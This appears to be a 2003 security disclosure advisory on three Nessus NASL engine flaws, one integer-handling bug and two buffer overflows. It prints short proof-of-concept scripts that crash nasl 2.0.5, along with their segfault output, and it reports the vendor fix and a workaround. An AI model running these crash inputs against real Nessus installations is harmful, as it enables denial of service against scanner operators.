// @(#)Security advisory: Nessus NASL scripting engine security issues



Release date: May 23, 2003 

Name: Nessus NASL scripting engine security issues

Author: Sir Mordred <mordred@s-mail.com>



I. DESCRIPTION



The "Nessus" Project aims to provide to the internet community a free,
powerful, up-to-date and easy to use remote security scanner.

Nessus is very fast, reliable and has a modular architecture that allows
you to fit it to your needs. 

Please visit http://www.nessus.org for more information about Nessus.



II. DETAILS



There exists some vulnerabilities in NASL scripting engine.

To exploit these flaws, an attacker would need to have a valid Nessus
account as well as the ability to upload arbitrary Nessus plugins in the
Nessus server (this option is disabled by default) or he/she would need to
trick a user somehow into running a specially crafted nasl script.



Not that these issues can NOT be exploited by a tested host to crash
nessusd remotely.



* ISSUE 1 - Integer handling vulnerability in insstr() function



Vulnerability is triggered by a negative fourth argument:



$ cat t1.nasl

insstr("aaaaaaaaaaa", "bb", 3, 0xfffffffd);



$ nasl t1.nasl

** WARNING : packet forgery will not work

** as NASL is not running as root

[1384](t1.nasl)  insstr: warning! 1st index 3 greater than 2nd index -3

Segmentation fault (core dumped)



* ISSUE 2 - Buffer overflow in scanner_add_port() function



Overflow is triggered by very long 'proto' argument:



$ cat t2.nasl

scanner_add_port(port : 80, proto : crap(data:'A', length:300));



$ nasl t2.nasl

** WARNING : packet forgery will not work

** as NASL is not running as root

Segmentation fault (core dumped)



* ISSUE 3 - Buffer overflow in ftp_log_in() function



Overflow is triggered by very long 'user'/'pass' arguments:



$ cat t3.nasl

ftp_log_in(socket : open_sock_tcp(21), pass : "11", user:

crap(data:'A',length:8192)); 



$ nasl t3.nasl

** WARNING : packet forgery will not work

** as NASL is not running as root

Segmentation fault (core dumped)



III. VERSIONS TESTED



Linux RedHat 7.2



$ nasl -v | grep nasl

nasl 2.0.5



IV. VENDOR STATUS



New nessus 2.0.6 packages fixes these issues.



V. WORKAROUND



Make sure the option 'plugins_upload' is set to 'no' in nessusd.conf and
don't run unstrusted nasl scripts.



VI. CREDITS



Hank Leininger <hlein@progressive-comp.com> requested the source code audit
for some opensource projects and for nessus in particular.



Sir Mordred <mordred@s-mail.com> discovered the issues.



Renaud Deraison <deraison@nessus.org> fixed them in an hour after being
notified.



VII. ABOUT



I offering the absolutely free source code audit for opensourced

products. The programming languages acceptable for audit are: Perl, Python,

PHP, ASP, C/C++, Java. I will accept almost any code in these languages

which runs on Unix/Windows platforms.



All you need is to send the email to mordred@s-mail.com with the subject

"Security audit: source code"

and get the form in which you will answer several questions, such as

the description of the product, the details of obtaining the source code,

acceptable period of audit and so on.



After audit, you will receive the full description of vulnerabilities

found, along with the advices that will help you to fix them properly. When

you fix the vulnerabilities there should be released a public security

advisory in which the fix information will be contained and also i will be

properly credited.





________________________________________________________________________
This letter has been delivered unencrypted. We'd like to remind you that
the full protection of e-mail correspondence is provided by S-mail
encryption mechanisms if only both, Sender and Recipient use S-mail.
Register at S-mail.com: http://www.s-mail.com